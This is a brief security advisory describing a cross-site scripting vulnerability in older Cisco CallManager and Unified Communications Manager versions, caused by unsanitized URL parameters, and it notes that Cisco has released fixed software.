Cisco CallManager prior to 3.3(5)sr2b and prior to 4.1(3)sr5, and versions of Cisco Unified Communications Manager prior to 4.2(3)sr2 and prior to 4.3(1)sr1 contain a vulnerability that could allow an unauthenticated, remote attacker to bypass security restrictions and conduct cross-site scripting attacks.
This vulnerability exists due to insufficient sanitization of parameters within URLs before they are returned to the user. An unauthenticated, remote attacker could exploit this vulnerability by convincing a user to follow a malicious link. As a result, the attacker could trigger the execution of arbitrary HTML or script code within a user's browser session in the context of the affected site.
Cisco confirmed this vulnerability in a security advisory and released updated software.